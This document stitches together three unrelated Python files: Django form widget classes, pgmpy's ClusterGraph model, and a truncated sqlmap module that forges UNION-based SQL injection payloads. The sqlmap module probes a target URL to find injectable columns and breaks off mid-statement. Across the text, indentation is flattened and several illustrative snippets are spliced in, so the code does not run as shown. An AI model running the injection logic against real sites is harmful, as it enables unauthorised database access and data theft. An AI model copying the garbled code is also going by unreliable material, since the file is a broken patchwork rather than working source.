class DateTimeInput(DateTimeBaseInput):
format_key = 'DATETIME_INPUT_FORMATS'
template_name = 'django/forms/widgets/datetime.html'
class TimeInput(DateTimeBaseInput):
format_key = 'TIME_INPUT_FORMATS'
template_name = 'django/forms/widgets/time.html'
# Defined at module level so that CheckboxInput is picklable (#17976)
def boolean_check(v):
return not (v is False or v is None or v == '')
class CheckboxInput(Input):
input_type = 'checkbox'
template_name = 'django/forms/widgets/checkbox.html'
def __init__(self, attrs=None, check_test=None):
super().__init__(attrs)
# check_test is a callable that takes a value and returns True
# if the checkbox should be checked for that value.
self.check_test = boolean_check if check_test is None else check_test
def format_value(self, value):
"""Only return the 'value' attribute if value isn't empty."""
if value is True or value is False or value is None or value == '':
return
return str(value)
def get_context(self, name, value, attrs):
if self.check_test(value):
attrs = {**(attrs or {}), 'checked': True}
return super().get_context(name, value, attrs)
def value_from_datadict(self, data, files, name):
if name not in data:
# A missing value means False because HTML form submission does not
# send results for unselected checkboxes.
return False
value = data.get(name)
# Translate true and false strings to boolean values.
values = {'true': True, 'false': False}
if isinstance(value, str):
value = values.get(value.lower(), value)
return bool(value)
def value_omitted_from_data(self, data, files, name):
# HTML checkboxes don't appear in POST data if not checked, so it's
# never known if the value is actually omitted.
return False
class ChoiceWidget(Widget):
allow_multiple_selected = False
input_type = None
template_name = None
option_template_name = None
add_id_index = True
checked_attribute = {'checked': True}
option_inherits_attrs = True
def __init__(self, attrs=None, choices=()):
super().__init__(attrs)
# choices can be any iterable, but we may need to render this widget
# multiple times. Thus, collapse it into a list so it can be consumed
# more than once.
self.choices = list(choices)
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
obj.choices = copy.copy(self.choices)
memo[id(self)] = obj
return obj
def subwidgets(self, name, value, attrs=None):
"""
Yield all "subwidgets" of this widget. Used to enable iterating
options from a BoundField for choice widgets.
"""
value = self.format_value(value)
yield from self.options(name, value, attrs)
def options(self, name, value, attrs=None):
"""Yield a flat list of options for this widgets."""
for group in self.optgroups(name, value, attrs):
yield from group[1]
def optgroups(self, name, value, attrs=None):
"""Return a list of optgroups for this widget."""
groups = []
has_selected = False
for index, (option_value, option_label) in enumerate(self.choices):
if option_value is None:
option_value = ''
subgroup = []
if isinstance(option_label, (list, tuple)):
group_name = option_value
subindex = 0
choices = option_label
else:
group_name = None
subindex = None
choices = [(option_value, option_label)]
groups.append((group_name, subgroup, index))
for subvalue, sublabel in choices:
selected = (
str(subvalue) in value and
(not has_selected or self.allow_multiple_selected)
)
has_selected |= selected
subgroup.append(self.create_option(
name, subvalue, sublabel, selected, index,
subindex=subindex, attrs=attrs,
))
if subindex is not None:
subindex += 1
return groups
def create_option(self, name, value, label, selected, index, subindex=None, attrs=None):
index = str(index) if subindex is None else "%s_%s" % (index, subindex)
if attrs is None:
attrs = {}
option_attrs = self.build_attrs(self.attrs, attrs) if self.option_inherits_attrs else {}
if selected:
option_attrs.update(self.checked_attribute)
if 'id' in option_attrs:
option_attrs['id'] = self.id_for_label(option_attrs['id'], index)
return {
'name': name,
'value': value,
'label': label,
'selected': selected,
'index': index,
'attrs': option_attrs,
'type': self.input_type,
'template_name': self.option_template_name,
'wrap_label': True,
}
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['optgroups'] = self.optgroups(name, context['widget']['value'], attrs)
return context
def id_for_label(self, id_, index='0'):
"""
Use an incremented id for each option where the main widget
references the zero index.
"""
if id_ and self.add_id_index:
id_ = '%s_%s' % (id_, index)
return id_
def value_from_datadict(self, data, files, name):
getter = data.get
if self.allow_multiple_selected:
try:
getter = data.getlist
except AttributeError:
pass
return getter(name)
def format_value(self, value):
"""Return selected values as a list."""
if value is None and self.allow_multiple_selected:
return []
if not isinstance(value, (tuple, list)):
value = [value]
return [str(v) if v is not None else '' for v in value]
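# A minimal sketch, with illustrative choices, of the (group_name, options,
# index) triples optgroups() returns for a grouped Select; the nested
# "Audio" pair becomes its own optgroup.
def _optgroups_sketch():
    select = Select(choices=[
        ('', 'Choose...'),
        ('Audio', [('vinyl', 'Vinyl'), ('cd', 'CD')]),
    ])
    return select.optgroups('media', value=['cd'])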
class Select(ChoiceWidget):
input_type = 'select'
template_name = 'django/forms/widgets/select.html'
option_template_name = 'django/forms/widgets/select_option.html'
add_id_index = False
checked_attribute = {'selected': True}
option_inherits_attrs = False
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
if self.allow_multiple_selected:
context['widget']['attrs']['multiple'] = True
return context
@staticmethod
def _choice_has_empty_value(choice):
"""Return True if the choice's value is empty string or None."""
value, _ = choice
return value is None or value == ''
def use_required_attribute(self, initial):
"""
Don't render 'required' if the first <option> has a value, as that's
invalid HTML.
"""
use_required_attribute = super().use_required_attribute(initial)
# 'required' is always okay for <select multiple>.
if self.allow_multiple_selected:
return use_required_attribute
first_choice = next(iter(self.choices), None)
return use_required_attribute and first_choice is not None and self._choice_has_empty_value(first_choice)
class NullBooleanSelect(Select):
"""
A Select Widget intended to be used with NullBooleanField.
"""
def __init__(self, attrs=None):
choices = (
('unknown', _('Unknown')),
('true', _('Yes')),
('false', _('No')),
)
super().__init__(attrs, choices)
def format_value(self, value):
try:
return {
True: 'true', False: 'false',
'true': 'true', 'false': 'false',
# For backwards compatibility with Django < 2.2.
'2': 'true', '3': 'false',
}[value]
except KeyError:
return 'unknown'
def value_from_datadict(self, data, files, name):
value = data.get(name)
return {
True: True,
'True': True,
'False': False,
False: False,
'true': True,
'false': False,
# For backwards compatibility with Django < 2.2.
'2': True,
'3': False,
}.get(value)
class SelectMultiple(Select):
allow_multiple_selected = True
def value_from_datadict(self, data, files, name):
try:
getter = data.getlist
except AttributeError:
getter = data.get
return getter(name)
def value_omitted_from_data(self, data, files, name):
# An unselected <select multiple> doesn't appear in POST data, so it's
# never known if the value is actually omitted.
return False
class RadioSelect(ChoiceWidget):
input_type = 'radio'
template_name = 'django/forms/widgets/radio.html'
option_template_name = 'django/forms/widgets/radio_option.html'
class CheckboxSelectMultiple(ChoiceWidget):
allow_multiple_selected = True
input_type = 'checkbox'
template_name = 'django/forms/widgets/checkbox_select.html'
option_template_name = 'django/forms/widgets/checkbox_option.html'
def use_required_attribute(self, initial):
# Don't use the 'required' attribute because browser validation would
# require all checkboxes to be checked instead of at least one.
return False
def value_omitted_from_data(self, data, files, name):
# HTML checkboxes don't appear in POST data if not checked, so it's
# never known if the value is actually omitted.
return False
def id_for_label(self, id_, index=None):
"""
Don't include for="field_0" in <label> because clicking such a label
would toggle the first checkbox.
"""
if index is None:
return ''
return super().id_for_label(id_, index)
class MultiWidget(Widget):
"""
A widget that is composed of multiple widgets.
In addition to the values added by Widget.get_context(), this widget
adds a list of subwidgets to the context as widget['subwidgets'].
These can be looped over and rendered like normal widgets.
You'll probably want to use this class with MultiValueField.
"""
template_name = 'django/forms/widgets/multiwidget.html'
def __init__(self, widgets, attrs=None):
if isinstance(widgets, dict):
self.widgets_names = [
('_%s' % name) if name else '' for name in widgets
]
widgets = widgets.values()
else:
self.widgets_names = ['_%s' % i for i in range(len(widgets))]
self.widgets = [w() if isinstance(w, type) else w for w in widgets]
super().__init__(attrs)
@property
def is_hidden(self):
return all(w.is_hidden for w in self.widgets)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
if self.is_localized:
for widget in self.widgets:
widget.is_localized = self.is_localized
# value is a list of values, each corresponding to a widget
# in self.widgets.
if not isinstance(value, list):
value = self.decompress(value)
final_attrs = context['widget']['attrs']
input_type = final_attrs.pop('type', None)
id_ = final_attrs.get('id')
subwidgets = []
for i, (widget_name, widget) in enumerate(zip(self.widgets_names, self.widgets)):
if input_type is not None:
widget.input_type = input_type
widget_name = name + widget_name
try:
widget_value = value[i]
except IndexError:
widget_value = None
if id_:
widget_attrs = final_attrs.copy()
widget_attrs['id'] = '%s_%s' % (id_, i)
else:
widget_attrs = final_attrs
subwidgets.append(widget.get_context(widget_name, widget_value, widget_attrs)['widget'])
context['widget']['subwidgets'] = subwidgets
return context
def id_for_label(self, id_):
if id_:
id_ += '_0'
return id_
def value_from_datadict(self, data, files, name):
return [
widget.value_from_datadict(data, files, name + widget_name)
for widget_name, widget in zip(self.widgets_names, self.widgets)
]
def value_omitted_from_data(self, data, files, name):
return all(
widget.value_omitted_from_data(data, files, name + widget_name)
for widget_name, widget in zip(self.widgets_names, self.widgets)
)
def decompress(self, value):
"""
Return a list of decompressed values for the given compressed value.
The given value can be assumed to be valid, but not necessarily
non-empty.
"""
raise NotImplementedError('Subclasses must implement this method.')
def _get_media(self):
"""
Media for a multiwidget is the combination of all media of the
subwidgets.
"""
media = Media()
for w in self.widgets:
media = media + w.media
return media
media = property(_get_media)
def __deepcopy__(self, memo):
obj = super().__deepcopy__(memo)
obj.widgets = copy.deepcopy(self.widgets)
return obj
@property
def needs_multipart_form(self):
return any(w.needs_multipart_form for w in self.widgets)
class SplitDateTimeWidget(MultiWidget):
"""
A widget that splits datetime input into two <input type="text"> boxes.
"""
supports_microseconds = False
template_name = 'django/forms/widgets/splitdatetime.html'
def __init__(self, attrs=None, date_format=None, time_format=None, date_attrs=None, time_attrs=None):
widgets = (
DateInput(
attrs=attrs if date_attrs is None else date_attrs,
format=date_format,
),
TimeInput(
attrs=attrs if time_attrs is None else time_attrs,
format=time_format,
),
)
super().__init__(widgets)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return [value.date(), value.time()]
return [None, None]
class SplitHiddenDateTimeWidget(SplitDateTimeWidget):
"""
A widget that splits datetime input into two <input type="hidden"> inputs.
"""
template_name = 'django/forms/widgets/splithiddendatetime.html'
def __init__(self, attrs=None, date_format=None, time_format=None, date_attrs=None, time_attrs=None):
super().__init__(attrs, date_format, time_format, date_attrs, time_attrs)
for widget in self.widgets:
widget.input_type = 'hidden'
class SelectDateWidget(Widget):
"""
A widget that splits date input into three <select> boxes.
This also serves as an example of a Widget that has more than one HTML
element and hence implements value_from_datadict.
"""
none_value = ('', '---')
month_field = '%s_month'
day_field = '%s_day'
year_field = '%s_year'
template_name = 'django/forms/widgets/select_date.html'
input_type = 'select'
select_widget = Select
date_re = _lazy_re_compile(r'(\d{4}|0)-(\d\d?)-(\d\d?)$')
def __init__(self, attrs=None, years=None, months=None, empty_label=None):
self.attrs = attrs or {}
# Optional list or tuple of years to use in the "year" select box.
if years:
self.years = years
else:
this_year = datetime.date.today().year
self.years = range(this_year, this_year + 10)
# Optional dict of months to use in the "month" select box.
if months:
self.months = months
else:
self.months = MONTHS
# Optional string, list, or tuple to use as empty_label.
if isinstance(empty_label, (list, tuple)):
if not len(empty_label) == 3:
raise ValueError('empty_label list/tuple must have 3 elements.')
self.year_none_value = ('', empty_label[0])
self.month_none_value = ('', empty_label[1])
self.day_none_value = ('', empty_label[2])
else:
if empty_label is not None:
self.none_value = ('', empty_label)
self.year_none_value = self.none_value
self.month_none_value = self.none_value
self.day_none_value = self.none_value
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
date_context = {}
year_choices = [(i, str(i)) for i in self.years]
if not self.is_required:
year_choices.insert(0, self.year_none_value)
year_name = self.year_field % name
date_context['year'] = self.select_widget(attrs, choices=year_choices).get_context(
name=year_name,
value=context['widget']['value']['year'],
attrs={**context['widget']['attrs'], 'id': 'id_%s' % year_name},
)
month_choices = list(self.months.items())
if not self.is_required:
month_choices.insert(0, self.month_none_value)
month_name = self.month_field % name
date_context['month'] = self.select_widget(attrs, choices=month_choices).get_context(
name=month_name,
value=context['widget']['value']['month'],
attrs={**context['widget']['attrs'], 'id': 'id_%s' % month_name},
)
day_choices = [(i, i) for i in range(1, 32)]
if not self.is_required:
day_choices.insert(0, self.day_none_value)
day_name = self.day_field % name
date_context['day'] = self.select_widget(attrs, choices=day_choices).get_context(
name=day_name,
value=context['widget']['value']['day'],
attrs={**context['widget']['attrs'], 'id': 'id_%s' % day_name},
)
subwidgets = []
for field in self._parse_date_fmt():
subwidgets.append(date_context[field]['widget'])
context['widget']['subwidgets'] = subwidgets
return context
def format_value(self, value):
"""
Return a dict containing the year, month, and day of the current value.
Use dict instead of a datetime to allow invalid dates such as February
31 to display correctly.
"""
year, month, day = None, None, None
if isinstance(value, (datetime.date, datetime.datetime)):
year, month, day = value.year, value.month, value.day
elif isinstance(value, str):
match = self.date_re.match(value)
if match:
# Convert any zeros in the date to empty strings to match the
# empty option value.
year, month, day = [int(val) or '' for val in match.groups()]
else:
input_format = get_format('DATE_INPUT_FORMATS')[0]
try:
d = datetime.datetime.strptime(value, input_format)
except ValueError:
pass
else:
year, month, day = d.year, d.month, d.day
return {'year': year, 'month': month, 'day': day}
@staticmethod
def _parse_date_fmt():
fmt = get_format('DATE_FORMAT')
escaped = False
for char in fmt:
if escaped:
escaped = False
elif char == '\\':
escaped = True
elif char in 'Yy':
yield 'year'
elif char in 'bEFMmNn':
yield 'month'
elif char in 'dj':
yield 'day'
def id_for_label(self, id_):
for first_select in self._parse_date_fmt():
return '%s_%s' % (id_, first_select)
return '%s_month' % id_
def value_from_datadict(self, data, files, name):
y = data.get(self.year_field % name)
m = data.get(self.month_field % name)
d = data.get(self.day_field % name)
if y == m == d == '':
return None
if y is not None and m is not None and d is not None:
input_format = get_format('DATE_INPUT_FORMATS')[0]
try:
date_value = datetime.date(int(y), int(m), int(d))
except ValueError:
# Return pseudo-ISO dates with zeros for any unselected values,
# e.g. '2017-0-23'.
return '%s-%s-%s' % (y or 0, m or 0, d or 0)
date_value = datetime_safe.new_date(date_value)
return date_value.strftime(input_format)
return data.get(name)
def value_omitted_from_data(self, data, files, name):
return not any(
('{}_{}'.format(name, interval) in data)
for interval in ('year', 'month', 'day')
)
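# --- Illustrative sketch (not part of Django's source) ----------------------
# MultiWidget.decompress() is the one hook subclasses must provide;
# SplitDateTimeWidget above is the canonical example. A minimal custom
# subclass (CoordinateWidget and the "lat,lng" encoding are assumptions for
# illustration) could look like this:
class CoordinateWidget(MultiWidget):
    def __init__(self, attrs=None):
        # Two plain text inputs, one per coordinate component.
        super().__init__((TextInput(), TextInput()), attrs)

    def decompress(self, value):
        # Split the compressed "lat,lng" value back into per-widget parts.
        if value:
            return value.split(',', 1)
        return [None, None]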
|
|
#!/usr/bin/env python3
from collections import defaultdict
import numpy as np
from pgmpy.base import UndirectedGraph
from pgmpy.exceptions import CardinalityError
from pgmpy.factors import factor_product
from pgmpy.extern.six.moves import filter, range, zip
class ClusterGraph(UndirectedGraph):
r"""
Base class for representing Cluster Graph.
A cluster graph is an undirected graph in which each node is associated with a subset of variables. The graph
contains undirected edges that connect clusters whose scopes have a non-empty intersection.
Formally, a cluster graph for a set of factors :math:`\Phi` over :math:`\mathcal{X}` is an undirected graph
:math:`\mathcal{U}`, each of whose nodes :math:`i` is associated with a subset :math:`C_i \subseteq \mathcal{X}`.
A cluster graph must be family-preserving - each factor :math:`\phi \in \Phi` must be associated with a cluster
:math:`C_i`, denoted :math:`\alpha(\phi)`, such that :math:`Scope[\phi] \subseteq C_i`. Each edge between a pair
of clusters :math:`C_i` and :math:`C_j` is associated with a sepset :math:`S_{i,j} \subseteq C_i \cap C_j`.
Parameters
----------
data: input graph
Data to initialize the graph. If data=None (default), an empty graph is created. The data is an edge list.
Examples
--------
Create an empty ClusterGraph with no nodes and no edges
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
G can be grown by adding clique nodes.
**Nodes:**
Add a tuple (or list or set) of nodes as single clique node.
>>> G.add_node(('a', 'b', 'c'))
>>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
**Edges:**
G can also be grown by adding edges.
>>> G.add_edge(('a', 'b', 'c'), ('a', 'b'))
or a list of edges
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
"""
def __init__(self, ebunch=None):
super(ClusterGraph, self).__init__()
if ebunch:
self.add_edges_from(ebunch)
self.factors = []
def add_node(self, node, **kwargs):
"""
Add a single node to the cluster graph.
Parameters
----------
node: node
A node should be a collection of nodes forming a clique. It can be
a list, set or tuple of nodes
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_node(('a', 'b', 'c'))
"""
if not isinstance(node, (list, set, tuple)):
raise TypeError('Node can only be a list, set or tuple of nodes forming a clique')
node = tuple(node)
super(ClusterGraph, self).add_node(node, **kwargs)
def add_nodes_from(self, nodes, **kwargs):
"""
Add multiple nodes to the cluster graph.
Parameters
----------
nodes: iterable container
A container of nodes (list, dict, set, etc.).
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
"""
for node in nodes:
self.add_node(node, **kwargs)
def add_edge(self, u, v, **kwargs):
"""
Add an edge between two clique nodes.
Parameters
----------
u, v: nodes
Nodes can be any list or set or tuple of nodes forming a clique.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
"""
set_u = set(u)
set_v = set(v)
if set_u.isdisjoint(set_v):
raise ValueError('No sepset found between these two clusters.')
super(ClusterGraph, self).add_edge(u, v)
def add_factors(self, *factors):
"""
Associate a factor with the graph.
See factors class for the order of potential values
Parameters
----------
*factors: pgmpy.factors.Factor objects
A factor object on any subset of the variables of the model which
is to be associated with the model.
Returns
-------
None
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> student = ClusterGraph()
>>> student.add_node(('Alice', 'Bob'))
>>> factor = Factor(['Alice', 'Bob'], cardinality=[3, 2],
... values=np.random.rand(6))
>>> student.add_factors(factor)
"""
for factor in factors:
factor_scope = set(factor.scope())
nodes = [set(node) for node in self.nodes()]
if factor_scope not in nodes:
raise ValueError('Factors defined on clusters of variables not present in the model')
self.factors.append(factor)
def get_factors(self, node=None):
"""
Return the factors added to the graph so far.
If node is not None, return the factor corresponding to the given
node.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
>>> phi1 = Factor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
>>> phi2 = Factor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi3 = Factor(['a', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2, phi3)
>>> G.get_factors()
>>> G.get_factors(node=('a', 'b', 'c'))
"""
if node is None:
return self.factors
else:
nodes = [set(n) for n in self.nodes()]
if set(node) not in nodes:
raise ValueError('Node not present in Cluster Graph')
factors = filter(lambda x: set(x.scope()) == set(node), self.factors)
return next(factors)
def remove_factors(self, *factors):
"""
Removes the given factors from the added factors.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> student = ClusterGraph()
>>> factor = Factor(['Alice', 'Bob'], cardinality=[2, 2],
...                 values=np.random.rand(4))
>>> student.add_factors(factor)
>>> student.remove_factors(factor)
"""
for factor in factors:
self.factors.remove(factor)
def get_cardinality(self):
"""
Returns a dictionary with the variables of the factors as keys and
their respective cardinality as values.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> student = ClusterGraph()
>>> factor = Factor(['Alice', 'Bob'], cardinality=[2, 2],
... values=np.random.rand(4))
>>> student.add_node(('Alice', 'Bob'))
>>> student.add_factors(factor)
>>> student.get_cardinality()
defaultdict(<class 'int'>, {'Bob': 2, 'Alice': 2})
"""
cardinalities = defaultdict(int)
for factor in self.factors:
for variable, cardinality in zip(factor.scope(), factor.cardinality):
cardinalities[variable] = cardinality
return cardinalities
def get_partition_function(self):
r"""
Returns the partition function for a given undirected graph.
A partition function is defined as
.. math:: \sum_{X}(\prod_{i=1}^{m} \phi_i)
where m is the number of factors present in the graph
and X are all the random variables present.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
>>> phi1 = Factor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
>>> phi2 = Factor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi3 = Factor(['a', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2, phi3)
>>> G.get_partition_function()
"""
if self.check_model():
factor = self.factors[0]
factor = factor_product(factor, *[self.factors[i] for i in range(1, len(self.factors))])
return np.sum(factor.values)
def check_model(self):
"""
Check the model for various errors. This method checks for the following
errors. At the same time, it also updates the cardinalities of all the
random variables.
* Checks if clique potentials are defined for all the cliques or not.
* The running intersection property is not checked explicitly here,
as it is enforced in the add_edge method.
Returns
-------
check: boolean
True if all the checks are passed
"""
for clique in self.nodes():
    if not self.get_factors(clique):
        raise ValueError('Factors for all the cliques or clusters are not defined.')
if len(self.factors) != len(self.nodes()):
    raise ValueError('A one-to-one mapping between factors and cliques/clusters does not exist.')
cardinalities = self.get_cardinality()
for factor in self.factors:
for variable, cardinality in zip(factor.scope(), factor.cardinality):
if (cardinalities[variable] != cardinality):
raise CardinalityError(
'Cardinality of variable %s not matching among factors' % variable)
return True
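# --- Illustrative sketch (not part of pgmpy) ---------------------------------
# End-to-end usage following the docstring examples above: build a small
# family-preserving cluster graph, attach one factor per clique, and compute
# the partition function (check_model() is invoked internally).
if __name__ == '__main__':
    from pgmpy.factors import Factor
    G = ClusterGraph()
    G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
    G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
                      (('a', 'b', 'c'), ('a', 'c'))])
    phi1 = Factor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
    phi2 = Factor(['a', 'b'], [2, 2], np.random.rand(4))
    phi3 = Factor(['a', 'c'], [2, 2], np.random.rand(4))
    G.add_factors(phi1, phi2, phi3)
    print(G.get_partition_function())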
|
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import random
import re
from lib.core.agent import agent
from lib.core.common import average
from lib.core.common import Backend
from lib.core.common import isNullValue
from lib.core.common import listToStrValue
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import removeReflectiveValues
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import stdev
from lib.core.common import wasLastResponseDBMSError
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import PAYLOAD
from lib.core.settings import LIMITED_ROWS_TEST_NUMBER
from lib.core.settings import UNION_MIN_RESPONSE_CHARS
from lib.core.settings import UNION_STDEV_COEFF
from lib.core.settings import MIN_RATIO
from lib.core.settings import MAX_RATIO
from lib.core.settings import MIN_STATISTICAL_RANGE
from lib.core.settings import MIN_UNION_RESPONSES
from lib.core.settings import NULL
from lib.core.settings import ORDER_BY_STEP
from lib.core.unescaper import unescaper
from lib.request.comparison import comparison
from lib.request.connect import Connect as Request
def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
"""
Finds number of columns affected by UNION based injection
"""
retVal = None
def _orderByTechnique():
def _orderByTest(cols):
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
if _orderByTest(1) and not _orderByTest(randomInt()):
infoMsg = "ORDER BY technique seems to be usable. "
infoMsg += "This should reduce the time needed "
infoMsg += "to find the right number "
infoMsg += "of query columns. Automatically extending the "
infoMsg += "range for current UNION query injection technique test"
singleTimeLogMessage(infoMsg)
lowCols, highCols = 1, ORDER_BY_STEP
found = None
while not found:
if _orderByTest(highCols):
lowCols = highCols
highCols += ORDER_BY_STEP
else:
while not found:
mid = highCols - (highCols - lowCols) // 2  # integer midpoint
if _orderByTest(mid):
lowCols = mid
else:
highCols = mid
if (highCols - lowCols) < 2:
found = lowCols
return found
try:
pushValue(kb.errorIsNone)
items, ratios = [], []
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
if lowerCount == 1:
found = kb.orderByColumns or _orderByTechnique()
if found:
kb.orderByColumns = found
infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
singleTimeLogMessage(infoMsg)
return found
if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
upperCount = lowerCount + MIN_UNION_RESPONSES
min_, max_ = MAX_RATIO, MIN_RATIO
pages = {}
for count in xrange(lowerCount, upperCount + 1):
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar):
pages[count] = page
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
ratios.append(ratio)
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
if not isNullValue(kb.uChar):
for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
if len(filter(lambda x: x[1], contains)) == 1:
retVal = filter(lambda x: x[1], contains)[0][0]
break
if not retVal:
if min_ in ratios:
ratios.pop(ratios.index(min_))
if max_ in ratios:
ratios.pop(ratios.index(max_))
minItem, maxItem = None, None
for item in items:
if item[1] == min_:
minItem = item
elif item[1] == max_:
maxItem = item
if all(map(lambda x: x == min_ and x != max_, ratios)):
retVal = maxItem[0]
elif all(map(lambda x: x != min_ and x == max_, ratios)):
retVal = minItem[0]
elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
deviation = stdev(ratios)
lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
if min_ < lower:
retVal = minItem[0]
if max_ > upper:
if retVal is None or abs(max_ - upper) > abs(min_ - lower):
retVal = maxItem[0]
finally:
kb.errorIsNone = popValue()
if retVal:
infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
singleTimeLogMessage(infoMsg)
return retVal
def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
validPayload = None
vector = None
positions = range(0, count)
# Unbiased approach for searching for an appropriate usable column
random.shuffle(positions)
for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
if vector:
break
# For each column of the table (# of NULLs) perform a request using
# the UNION ALL SELECT statement to test if the target URL is
# affected by an exploitable UNION-based SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(charCount)
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(charCount)
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
elif not kb.unionDuplicates:
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
